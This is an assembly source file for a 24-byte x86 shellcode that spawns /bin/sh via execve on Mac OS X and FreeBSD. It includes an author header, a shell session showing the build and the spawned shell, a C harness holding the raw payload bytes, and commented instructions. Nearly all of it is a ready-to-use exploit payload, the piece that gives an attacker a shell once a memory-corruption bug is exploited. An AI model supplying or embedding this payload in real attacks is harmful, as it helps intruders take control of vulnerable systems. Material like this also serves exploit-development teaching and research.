; Shellcode-Desc .: execve() of /bin/sh
; Shellcode-Size .: 24 bytes
; Shellcode-Id ...: 814266649011790e99a9ff58773ea15e 
; Shellcode-Arch .: x86
; Nasm-Version ...: NASM version 0.98.40 (Apple Computer, Inc. build 9) compiled on Apr  6 2006
; Ndisasm-Version : NDISASM version 0.98.40 (Apple Computer, Inc. build 9) compiled Apr  6 2006
; Tested-OS ......: Mac OS X 10.4.x , FreeBSD 5.5-STABLE 
;
; RageMan <rageman@olografix.org>
;         <rageman@s0ftpj.org>
;
; Eva:~/shellcodes rageman$ nasm -f macho execve-0x02.asm
; Eva:~/shellcodes rageman$ ld -o execve-0x02 execve-0x02.o
; Eva:~/shellcodes rageman$ ./execve-0x02
; Eva:/Users/rageman/shellcodes rageman$ exit
; exit
; Eva:~/shellcodes rageman$ gcc -w -o execve-0x02 execve-0x02.c
; Eva:~/shellcodes rageman$ ./execve-0x02
; Eva:/Users/rageman/shellcodes rageman$ exit
; exit
; Eva:~/shellcodes rageman$ 
;
; <---execve-0x02.c-->
;  char shellcode[] =
;       "\x29\xc0\x50\x68\x2f\x2f\x73\x68"
;       "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
;       "\x54\x54\x53\x50\xb0\x3b\xcd\x80";
;
; int main()
; {
;         void (*fp)() = shellcode;
;         fp();
; }
; <-/-execve-0x02.c-->

BITS 32

GLOBAL _main

_main:
                       ; execve arguments
sub  eax, eax          ; prepare string terminator \0
push eax               ; put the string terminator into the stack
push 0x68732f2f        ; put hs// into the stack
push 0x6e69622f        ; put nib/ into the stack 
mov  ebx, esp          ; write string address into ebx

                       ; execve()
push eax               ; char *const envp[]
push esp               ; char *const argv[]
push esp               ; 
push ebx               ; const char *path
push eax               ; dummy
mov  al, 0x3b          ; value of SYS_execve
int  0x80              ; invoke kernel